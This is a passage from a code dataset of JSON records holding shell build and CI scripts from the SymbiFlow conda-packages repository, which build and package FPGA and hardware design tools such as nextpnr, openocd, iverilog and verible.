p.startswith('$CONDA_')])\nEOF\n\t\tfi\n\tdone\n}\n\npatch_conda\n\ncat > $CONDA_PATH/condarc <<'EOF'\n# Useful for automation\nshow_channel_urls: True\n\n# Prevent conda from automagically updating things\nauto_update_conda: False\nupdate_dependencies: False\n# Don't complain\nnotify_outdated_conda: false\n# Add channels\nchannel_priority: strict\nchannels:\nEOF\nCONDA_CHANNEL=$(echo $TRAVIS_REPO_SLUG | sed -e's@/.*$@@')\nif [ x$CONDA_CHANNEL != x ];then\ncat >> $CONDA_PATH/condarc <<EOF\n - $CONDA_CHANNEL\nEOF\nfi\ncat >> $CONDA_PATH/condarc <<'EOF'\n - symbiflow\n - defaults\nEOF\n\n# Install required build tools\nconda install -y conda-build anaconda-client jinja2 conda-verify ripgrep pexpect\n\nconda info | grep --color=always -e \"^\" -e \"populated config files\"\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 8.75, "blob_id": "c40aa7fc2d7a8f9e9a297ad56aaefd799b4117d1", "content_id": "1044fa8f837a247274624f916512ac4e86e7b336", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 39, "license_type": "permissive", "max_line_length": 15, "num_lines": 4, "path": "/capnproto-java/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash -ex\n\nmake all\nmake install\n" }, { "alpha_fraction": 0.7416974306106567, "alphanum_fraction": 0.7416974306106567, "avg_line_length": 22.565217971801758, "blob_id": "5c6127e965fe1fc4cfb383b25698f6e96552a3e8", "content_id": "f8423d11c855cfb998399729aaca400ea4cdfb21", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 542, "license_type": "permissive", "max_line_length": 71, "num_lines": 23, "path": "/.travis/fixup-git.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\nset -e\n\n# Git repo fixup\nstart_section \"environment.git\" \"Setting up ${YELLOW}git checkout${NC}\"\nset -x\ngit fetch --unshallow || true\ngit fetch --tags\ngit submodule update --recursive --init\ngit submodule foreach git submodule update --recursive --init\n$SPACER\ngit remote -v\ngit branch -v\ngit branch -D $TRAVIS_BRANCH\nCURRENT_GITREV=\"$(git rev-parse HEAD)\"\ngit checkout -b $TRAVIS_BRANCH $CURRENT_GITREV\ngit tag -l\ngit status -v\ngit describe --long\nset +x\nend_section \"environment.git\"\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7075471878051758, "avg_line_length": 29.285715103149414, "blob_id": "d158d2e7e6156a849264021d295ea431fbee1454", "content_id": "676dab6578b4b3224654238c897e0d22a479476e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 212, "license_type": "permissive", "max_line_length": 81, "num_lines": 7, "path": "/uhdm-integration/surelog-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\nmkdir -p \"$PREFIX/lib/surelog/sv\"\n\ncp \"$SRC_DIR/image/lib/surelog/sv/builtin.sv\" \"$PREFIX/lib/surelog/sv/builtin.sv\"\ncp \"$SRC_DIR/image/bin/surelog\" \"$PREFIX/bin/surelog-uhdm\"\n" }, { "alpha_fraction": 0.7210662961006165, "alphanum_fraction": 0.7217165231704712, "avg_line_length": 27.481481552124023, "blob_id": "88114d44359b857155e0446ce5f1aa184ed2ad08", "content_id": "a653f4a259b1caac405c756cb155d23a4576a00c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1538, "license_type": "permissive", "max_line_length": 90, "num_lines": 54, "path": "/.travis/install.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\nset -e\n\nif [ ! -z \"$USE_SYSTEM_GCC_VERSION\" ]; then\n\tsudo add-apt-repository ppa:ubuntu-toolchain-r/test -y\n\tsudo apt update\n\tsudo apt install -y gcc-${USE_SYSTEM_GCC_VERSION} g++-${USE_SYSTEM_GCC_VERSION}\nfi\n\nif [ ! -z \"$USE_PYPY\" ]; then\n\tsudo add-apt-repository ppa:pypy/ppa -y\n\tsudo apt update\n\tsudo apt install -y pypy3\nfi\n\n# Getting the conda environment\nstart_section \"environment.conda\" \"Setting up basic ${YELLOW}conda environment${NC}\"\n\nmkdir -p $BASE_PATH\n./conda-get.sh $CONDA_PATH\nhash -r\nend_section \"environment.conda\"\n\n$SPACER\n\n# Output some useful info\nstart_section \"info.conda.env\" \"Info on ${YELLOW}conda environment${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh info\nend_section \"info.conda.env\"\n\nstart_section \"info.conda.config\" \"Info on ${YELLOW}conda config${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh config --show\nend_section \"info.conda.config\"\n\nstart_section \"info.conda.package\" \"Info on ${YELLOW}conda package${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh render --no-source $CONDA_BUILD_ARGS || true\nend_section \"info.conda.package\"\n\n$SPACER\n\nstart_section \"conda.copy\" \"${GREEN}Copying package...${NC}\"\nmkdir -p /tmp/conda/$PACKAGE\ncp -vRL $PACKAGE/* /tmp/conda/$PACKAGE/\ncd /tmp/conda/\nsed -e\"s@git_url:.*://@$CONDA_PATH/conda-bld/git_cache/@\" -i /tmp/conda/$PACKAGE/meta.yaml\nend_section \"conda.copy\"\n\n$SPACER\n\nstart_section \"conda.download\" \"${GREEN}Downloading..${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh build --source $CONDA_BUILD_ARGS || true\nend_section \"conda.download\"\n" }, { "alpha_fraction": 0.6802167892456055, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 15.043478012084961, "blob_id": "277b9db44930bac86989d44b62dd86b518619645", "content_id": "fd65d9f8ac5282611a22ea6e9a3245045d9c73cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 369, "license_type": "permissive", "max_line_length": 59, "num_lines": 23, "path": "/sigrok-cli/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset CXXFLAGS # Will be set by configure below\n\nfor f in libserialport libsigrok libsigrokdecode sigrok-cli\ndo\n\tcd $f\n\t./autogen.sh\n\t./configure --prefix=$PREFIX\n\tmake -j$CPU_COUNT\n\tmake install\n\tcd -\ndone\n\n$PREFIX/bin/sigrok-cli -V\nfind $PREFIX/share -name \"__pycache__\" -exec rm -rv {} +\n" }, { "alpha_fraction": 0.628742516040802, "alphanum_fraction": 0.6317365169525146, "avg_line_length": 22.85714340209961, "blob_id": "9b565ae95fa8496325373a290ce218e201d35c21", "content_id": "237a68f25d6b23ee4b03bcc584945f58b295f70a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 668, "license_type": "permissive", "max_line_length": 70, "num_lines": 28, "path": "/conda-meta-extra.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPACKAGE=${1:-PACKAGE}\nif [ x$PACKAGE = x\"\" ]; then\n\techo \"\\$PACKAGE not set!\"\n\texit 1\nfi\n\nrm -f $PACKAGE/recipe_append.yaml\ncat > $PACKAGE/recipe_append.yaml <<EOF\nextra:\n maintainers:\n - Tim 'mithro' Ansell <mithro@mithis.com>\n - SymbiFlow Project - https://symbiflow.github.io\n travis:\n job_id: $TRAVIS_JOB_ID\n job_num: $TRAVIS_JOB_NUMBER\n type: $TRAVIS_EVENT_TYPE\n recipe:\n repo: 'https://github.com/$TRAVIS_REPO_SLUG'\n branch: $TRAVIS_BRANCH\n commit: $TRAVIS_COMMIT\n describe: $GITREV\n date: $DATESTR\nEOF\nif [ -e $PACKAGE/condarc ]; then\n\tcat $PACKAGE/condarc | sed -e's/^/ /' >> $PACKAGE/recipe_append.yaml\nfi\n" }, { "alpha_fraction": 0.6803278923034668, "alphanum_fraction": 0.6926229596138, "avg_line_length": 19.33333396911621, "blob_id": "2707c5a17a44e0ff7f0d06f52d8e3a8bfe117d67", "content_id": "e1d21e7ef8275be43a45eed746918b6abe1f40d7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 244, "license_type": "permissive", "max_line_length": 119, "num_lines": 12, "path": "/nextpnr-ice40/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncmake -DARCH=ice40 -DBUILD_GUI=OFF -DICEBOX_ROOT=${PREFIX}/share/icebox -DCMAKE_INSTALL_PREFIX=/ -DENABLE_READLINE=No .\nmake -j$(nproc)\nmake DESTDIR=${PREFIX} install\n" }, { "alpha_fraction": 0.6693404912948608, "alphanum_fraction": 0.6742424368858337, "avg_line_length": 29.324323654174805, "blob_id": "b8c377a2bbd5610ceef553fd853e7396f2c1242e", "content_id": "00c18a1ba2dddccfc18b1b07c37da78e7d33cdf9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2244, "license_type": "permissive", "max_line_length": 118, "num_lines": 74, "path": "/conda-env.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nexport CONDA_PATH=${CONDA_PATH:-~/conda}\nif [ ! -d $CONDA_PATH ];then\n\techo \"Conda not found at $CONDA_PATH\"\n\texit 1\nfi\nif [ ! -f $CONDA_PATH/bin/activate ];then\n\techo \"conda's bin/activate not found in $CONDA_PATH\"\n\texit 1\nfi\nif [ x$PACKAGE = x\"\" ]; then\n\techo \"\\$PACKAGE not set.\"\n\texit 1\nfi\n\n# Disable this warning;\n# xxxx/conda_build/environ.py:377: UserWarning: The environment variable\n# 'TRAVIS' is being passed through with value 0. If you are splitting\n# build and test phases with --no-test, please ensure that this value is\n# also set similarly at test time.\nexport PYTHONWARNINGS=ignore::UserWarning:conda_build.environ\n\nif [ -z \"$DATE_STR\" ]; then\n\texport DATE_NUM=\"$(date -u +%y%m%d%H%M)\"\n\texport DATE_STR=\"$(date -u +%Y%m%d_%H%M%S)\"\n\techo \"Setting date number to $DATE_NUM\"\n\techo \"Setting date string to $DATE_STR\"\nfi\nif [ -z \"$GITREV\" ]; then\n\texport GITREV=\"$(git describe --long)\"\n\techo \"Setting git revision $GITREV\"\nfi\n\nexport TRAVIS=0\nexport CI=0\n\nexport TRAVIS_EVENT_TYPE=${TRAVIS_EVENT_TYPE:-\"local\"}\necho \"TRAVIS_EVENT_TYPE='${TRAVIS_EVENT_TYPE}'\"\n\nexport TRAVIS_BRANCH=\"${TRAVIS_BRANCH:-$(git rev-parse --abbrev-ref HEAD)}\"\necho \"TRAVIS_BRANCH='${TRAVIS_BRANCH}'\"\n\nexport TRAVIS_COMMIT=\"${TRAVIS_BRANCH:-$(git rev-parse HEAD)}\"\necho \"TRAVIS_COMMIT='${TRAVIS_COMMIT}'\"\n\nexport TRAVIS_REPO_SLUG=\"${TRAVIS_REPO_SLUG:-$(git remote get-url origin | sed -e's-.*github\\.com/--' -e's/\\.git//')}\"\necho \"TRAVIS_REPO_SLUG='${TRAVIS_REPO_SLUG}'\"\n\n# >>> conda initialize >>>\n# !! Contents within this block are managed by 'conda init' !!\n__conda_setup=\"$(\"$CONDA_PATH/bin/conda\" 'shell.bash' 'hook' 2> /dev/null)\"\nif [ $? -eq 0 ]; then\n eval \"$__conda_setup\"\nelse\n if [ -f \"$CONDA_PATH/etc/profile.d/conda.sh\" ]; then\n . \"$CONDA_PATH/etc/profile.d/conda.sh\"\n else\n export PATH=\"$CONDA_PATH/bin:$PATH\"\n fi\nfi\nunset __conda_setup\n# <<< conda initialize <<<\n\nexport CONDARC=$CONDA_PATH/.condarc\nPACKAGE_ENV=$CONDA_PATH/envs/$PACKAGE\nif [ ! -d $PACKAGE_ENV ]; then\n\tconda create --yes --name $PACKAGE --strict-channel-priority\n\tln -sf $(realpath $PACKAGE/condarc) $PACKAGE_ENV/condarc\nfi\nconda activate $PACKAGE\n./conda-meta-extra.sh $PACKAGE\n./conda-tag-filter.sh $PACKAGE\nconda $@\n" }, { "alpha_fraction": 0.6805251836776733, "alphanum_fraction": 0.7330415844917297, "avg_line_length": 23.052631378173828, "blob_id": "3538a1e2a695190ee73413346e31b8e9fa23280e", "content_id": "d036918653df04cb509cfa340e6fd19e658c335a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 457, "license_type": "permissive", "max_line_length": 102, "num_lines": 19, "path": "/verible/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nexport CC=gcc-${USE_SYSTEM_GCC_VERSION}\nexport CXX=g++-${USE_SYSTEM_GCC_VERSION}\n\n\nmkdir bazel-install\nBAZEL_PREFIX=$PWD/bazel-install\n\nwget https://github.com/bazelbuild/bazel/releases/download/3.7.2/bazel-3.7.2-installer-linux-x86_64.sh\nchmod +x bazel-3.7.2-installer-linux-x86_64.sh\n./bazel-3.7.2-installer-linux-x86_64.sh --prefix=$BAZEL_PREFIX\n\nexport PATH=$BAZEL_PREFIX/bin:$PATH\n\nbazel run :install -c opt -- $PREFIX/bin\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 12.833333015441895, "blob_id": "b1403c6641a43b467b44adcfb3195e56a9c87c01", "content_id": "a464c76bc13a62c334604f6b158c0c06750a11e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 84, "license_type": "permissive", "max_line_length": 32, "num_lines": 6, "path": "/libusb/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n./configure --prefix=\"$PREFIX\" \\\n --disable-udev\nmake\nmake install\n\n" }, { "alpha_fraction": 0.7078059315681458, "alphanum_fraction": 0.7383966445922852, "avg_line_length": 29.580644607543945, "blob_id": "e4f9d23ab96e748c4286dd9fc1262e68738ed9db", "content_id": "743c1bd6aef1fb6c8278fb1ad7a7ec08208f1c9f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 948, "license_type": "permissive", "max_line_length": 145, "num_lines": 31, "path": "/iceprog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset CFLAGS\nunset CXXFLAGS\nunset CPPFLAGS\nunset DEBUG_CXXFLAGS\nunset DEBUG_CPPFLAGS\nunset LDFLAGS\n\nINCLUDES=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --cflags libftdi1 libusb libudev)\"\nINCLUDES='-I/usr/include/libftdi1 -I/usr/include/libusb-1.0'\nSTATIC_LIBS=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --libs libftdi1 libusb)\"\nSTATIC_LIBS=\"-L/usr/lib/x86_64-linux-gnu -lftdi1 -lusb-1.0 -lusb\"\nDYNAMIC_LIBS=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --libs libudev)\"\nDYNAMIC_LIBS=\"-L/lib/x86_64-linux-gnu -ludev\"\n\nexport CFLAGS=\"$CFLAGS $INCLUDES\"\nexport LDFLAGS=\"$LDFLAGS -lm -lstdc++ -lpthread -Wl,--whole-archive -Wl,-Bstatic $STATIC_LIBS -Wl,-Bdynamic -Wl,--no-whole-archive $DYNAMIC_LIBS\"\n\nmake -j$CPU_COUNT\n\nmake install\n\niceprog -h\n" }, { "alpha_fraction": 0.707848846912384, "alphanum_fraction": 0.707848846912384, "avg_line_length": 23.140350341796875, "blob_id": "7afdf7f0a3d82c9905d4aeaf7504ec96c40f2eae", "content_id": "4b3af2c516b385fae7a0b18506e7f52698880cee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1376, "license_type": "permissive", "max_line_length": 159, "num_lines": 57, "path": "/.travis/script.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n$SPACER\n\nstart_section \"info.conda.package\" \"Info on ${YELLOW}conda package${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh render $CONDA_BUILD_ARGS\nend_section \"info.conda.package\"\n\n$SPACER\n\nstart_section \"conda.check\" \"${GREEN}Checking...${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh build --check $CONDA_BUILD_ARGS || true\nend_section \"conda.check\"\n\n$SPACER\n\nstart_section \"conda.build\" \"${GREEN}Building..${NC}\"\nif [[ \"${KEEP_ALIVE}\" = 'true' ]]; then\n\ttravis_wait $TRAVIS_MAX_TIME $CONDA_PATH/bin/python $TRAVIS_BUILD_DIR/.travis-output.py /tmp/output.log $TRAVIS_BUILD_DIR/conda-env.sh build $CONDA_BUILD_ARGS\nelse\n\t$CONDA_PATH/bin/python $TRAVIS_BUILD_DIR/.travis-output.py /tmp/output.log $TRAVIS_BUILD_DIR/conda-env.sh build $CONDA_BUILD_ARGS\nfi\nend_section \"conda.build\"\n\n$SPACER\n\n# Remove trailing ';' and split CONDA_OUT into array of packages\nIFS=';' read -r -a PACKAGES <<< \"${CONDA_OUT%?}\"\n\nstart_section \"conda.build\" \"${GREEN}Installing..${NC}\"\nfor element in \"${PACKAGES[@]}\"\ndo\n\t$TRAVIS_BUILD_DIR/conda-env.sh install $element\ndone\nend_section \"conda.build\"\n\n$SPACER\n\nstart_section \"conda.du\" \"${GREEN}Disk usage..${NC}\"\n\nfor element in \"${PACKAGES[@]}\"\ndo\n\tdu -h $element\ndone\n\nend_section \"conda.du\"\n\n$SPACER\n\nstart_section \"conda.clean\" \"${GREEN}Cleaning up..${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean\"\n\n$SPACER\n" }, { "alpha_fraction": 0.6378269791603088, "alphanum_fraction": 0.6841046214103699, "avg_line_length": 15.032258033752441, "blob_id": "ed771ad547029956095a32d0d8a6b029b2dd899a", "content_id": "4ab4bb0736dfa57e13bd5f04aa941ab5b8c74384", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 503, "license_type": "permissive", "max_line_length": 52, "num_lines": 31, "path": "/openocd/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nelse\n\tCPU_COUNT=$(nproc)\nfi\n\nmv tcl/target/1986ве1т.cfg tcl/target/1986be1t.cfg\nmv tcl/target/к1879xб1я.cfg tcl/target/k1879x61r.cfg\n\nexport LIBS=\"$LIBS -lrt -lpthread\"\n\n./bootstrap\nmkdir build\ncd build\n../configure \\\n --prefix=$PREFIX \\\n --enable-static \\\n --disable-shared \\\n --enable-usb-blaster-2 \\\n --enable-usb_blaster_libftdi \\\n --enable-jtag_vpi \\\n --enable-remote-bitbang \\\n\n\nmake -j$CPU_COUNT\nmake install\n" }, { "alpha_fraction": 0.648790717124939, "alphanum_fraction": 0.663512110710144, "avg_line_length": 28.71875, "blob_id": "b04e81f64834227a98c6bd82a691a991793e9d81", "content_id": "d574bd9340450890bbdb61bee155d41a4a063fec", "detected_licenses": [ "BSD-3-Clause", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 951, "license_type": "permissive", "max_line_length": 103, "num_lines": 32, "path": "/capnproto/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -x\n\nmkdir build\ncd build\n\ndeclare -a CMAKE_PLATFORM_FLAGS\nif [[ ${HOST} =~ .*darwin.* ]]; then\n CMAKE_PLATFORM_FLAGS+=(-DCMAKE_OSX_SYSROOT=\"${CONDA_BUILD_SYSROOT}\")\n # \"-stdlib=libc++ -mmacosx-version-min=10.7\" are required to enable C++11 features\n #CMAKE_CXX_FLAGS=\"$CMAKE_CXX_FLAGS -stdlib=libc++ -mmacosx-version-min=10.7\"\n #EXTRA_CMAKE_ARGS=\"-DCMAKE_OSX_DEPLOYMENT_TARGET=10.7\"\n # Disable testing on OS X due to CMake config bugs fixed only in master:\n # https://github.com/sandstorm-io/capnproto/issues/322\n EXTRA_CMAKE_ARGS=\"$EXTRA_CMAKE_ARGS -DBUILD_TESTING=OFF -DCMAKE_CXX_COMPILE_FEATURES=cxx_constexpr\"\nfi\n\ncmake \\\n -DCMAKE_BUILD_TYPE=Release \\\n -DCMAKE_INSTALL_PREFIX=\"$PREFIX\" \\\n -DCMAKE_INSTALL_LIBDIR=\"lib\" \\\n $EXTRA_CMAKE_ARGS \\\n ../c++\n\ncmake --build . -- -j ${CPU_COUNT}\n\nif [ \"$(uname)\" != \"Darwin\" ]; then\n cmake --build . --target check\nfi\n\ncmake --build . --target install\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.7215189933776855, "avg_line_length": 25.33333396911621, "blob_id": "f947effd5e7928e0d5409541f384120cb1b5a819", "content_id": "6826d390631263fbb5019070dd56f03c094e2661", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 316, "license_type": "permissive", "max_line_length": 118, "num_lines": 12, "path": "/tree-sitter-verilog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nnpm install tree-sitter-cli\n\n./node_modules/tree-sitter-cli/tree-sitter generate\n\n$PYTHON -m pip install --isolated tree_sitter\n$PYTHON -c \"from tree_sitter import Language; Language.build_library(\\\"$PREFIX/lib/tree-sitter-verilog.so\\\", [\\\".\\\"])\"\n$PYTHON -m pip uninstall -y tree_sitter\n" }, { "alpha_fraction": 0.7243107557296753, "alphanum_fraction": 0.7243107557296753, "avg_line_length": 38.900001525878906, "blob_id": "5a089d2e79f7f0414a532801f400030fccb61ff0", "content_id": "643516680ff64ed18ad4d7113900324b25bbad25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 399, "license_type": "permissive", "max_line_length": 78, "num_lines": 10, "path": "/uhdm-integration/verilator-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\n\nsed -i 's/\"verilator_bin\"/\"verilator_bin-uhdm\"/g' image/bin/verilator\nsed -i 's/\"verilator_bin_dbg\"/\"verilator_bin_dbg-uhdm\"/g' image/bin/verilator\n\ncp \"$SRC_DIR/image/bin/verilator\" \"$PREFIX/bin/verilator-uhdm\"\ncp \"$SRC_DIR/image/bin/verilator_bin\" \"$PREFIX/bin/verilator_bin-uhdm\"\ncp \"$SRC_DIR/image/bin/verilator_bin_dbg\" \"$PREFIX/bin/verilator_bin_dbg-uhdm\"\n" }, { "alpha_fraction": 0.7034482955932617, "alphanum_fraction": 0.7068965435028076, "avg_line_length": 18.33333396911621, "blob_id": "dedafac32622a43f955a554e483894e23d214a1f", "content_id": "a9b4110a8debccd479563d21aec119843e028a98", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 290, "license_type": "permissive", "max_line_length": 59, "num_lines": 15, "path": "/surelog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n CPU_COUNT=2\nfi\n\nexport PKG_CONFIG_PATH=\"$BUILD_PREFIX/lib/pkgconfig/\"\nexport CXXFLAGS=\"$CXXFLAGS -I$BUILD_PREFIX/include\"\nexport LDFLAGS=\"$CXXFLAGS -L$BUILD_PREFIX/lib -lrt -ltinfo\"\n\nmake -j$CPU_COUNT\nmake -j$CPU_COUNT install\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 16.600000381469727, "blob_id": "fe77290e01912422d46115f4abf598af1a895936", "content_id": "4d259216d32541a6e9c673ff5db0ad04e100ac72", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 88, "license_type": "permissive", "max_line_length": 50, "num_lines": 5, "path": "/uhdm-integration/yosys-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\n\ncp \"$SRC_DIR/yosys/yosys\" \"$PREFIX/bin/yosys-uhdm\"\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6794871687889099, "avg_line_length": 10.142857551574707, "blob_id": "79063c3f9204265f96c639318711ea8424746e8e", "content_id": "4c6e67f4c2ad15e1a0071b956c44c33dbc2d5526", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 43, "num_lines": 7, "path": "/zachjs-sv2v/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nmake\ninstall -D bin/sv2v $PREFIX/bin/zachjs-sv2v\n" }, { "alpha_fraction": 0.5431893467903137, "alphanum_fraction": 0.5431893467903137, "avg_line_length": 21.296297073364258, "blob_id": "5732a3b628958841ff52b36270f6b54710ac345c", "content_id": "cf49b3674c1e34bc47a04e00f7b0189bdd358315", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1204, "license_type": "permissive", "max_line_length": 57, "num_lines": 54, "path": "/iverilog/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset +x\n\n$PREFIX/bin/iverilog -V\n$PREFIX/bin/iverilog -h || true\n\ncd test\n\n# Hello world test\necho\necho\necho \"Hello World Test =====\"\necho $PREFIX/bin/iverilog -v hello_world.v -o hello_world\n$PREFIX/bin/iverilog -v hello_world.v -o hello_world\necho \"----------------------\"\ncat hello_world\necho \"----------------------\"\n./hello_world | tee output.log\necho \"----------------------\"\ngrep -q 'Hello, World' output.log\necho \"----------------------\"\n\n# Counter\necho\necho\necho \"Counter Test =========\"\necho iverilog -o test_counter counter_tb.v counter.v\niverilog -o test_counter counter_tb.v counter.v\necho \"----------------------\"\ncat test_counter\necho \"- - - - - - - - - - --\"\necho vvp -n test_counter\nvvp -n test_counter\necho \"----------------------\"\necho iverilog -o test_counter -c counter_list.txt\niverilog -o test_counter -c counter_list.txt\necho \"- - - - - - - - - - --\"\necho vvp -n test_counter\nvvp -n test_counter\necho \"----------------------\"\n\n# More advanced test\necho\necho\necho \"FSM Test =============\"\necho iverilog -o test_fsm fsm.v\niverilog -o test_fsm fsm.v\necho \"----------------------\"\ncat test_fsm\necho \"----------------------\"\n./test_fsm\necho \"----------------------\"\n" }, { "alpha_fraction": 0.6124030947685242, "alphanum_fraction": 0.6201550364494324, "avg_line_length": 8.214285850524902, "blob_id": "2a409acb0e0dab2de7b9d14519837ee1f2ee73ea", "content_id": "d605fb7c1b4a2e1d126486ac0eaed09f455a683d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "permissive", "max_line_length": 31, "num_lines": 14, "path": "/icestorm/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmake -j$CPU_COUNT\n\nmake install\n\nicetime -h || true\n" }, { "alpha_fraction": 0.7561436891555786, "alphanum_fraction": 0.7580340504646301, "avg_line_length": 24.190475463867188, "blob_id": "dca3ee63b41f295449e43b6d4ad9f65ccece0200", "content_id": "0875d7808f92bbb3e36808b8dc8db0ae0a526df9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 529, "license_type": "permissive", "max_line_length": 98, "num_lines": 21, "path": "/netlistsvg/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nwhich npm\nnpm install -g .\n\n# Remove links created by npm\nunlink $PREFIX/bin/netlistsvg\nunlink $PREFIX/bin/netlistsvg-dumplayout\nunlink $PREFIX/lib/node_modules/netlistsvg\n\n# Copy the content instead, make relative links\ncp -r ./ $PREFIX/lib/node_modules/netlistsvg\nln -r -s $PREFIX/lib/node_modules/netlistsvg/bin/netlistsvg.js $PREFIX/bin/netlistsvg\nln -r -s 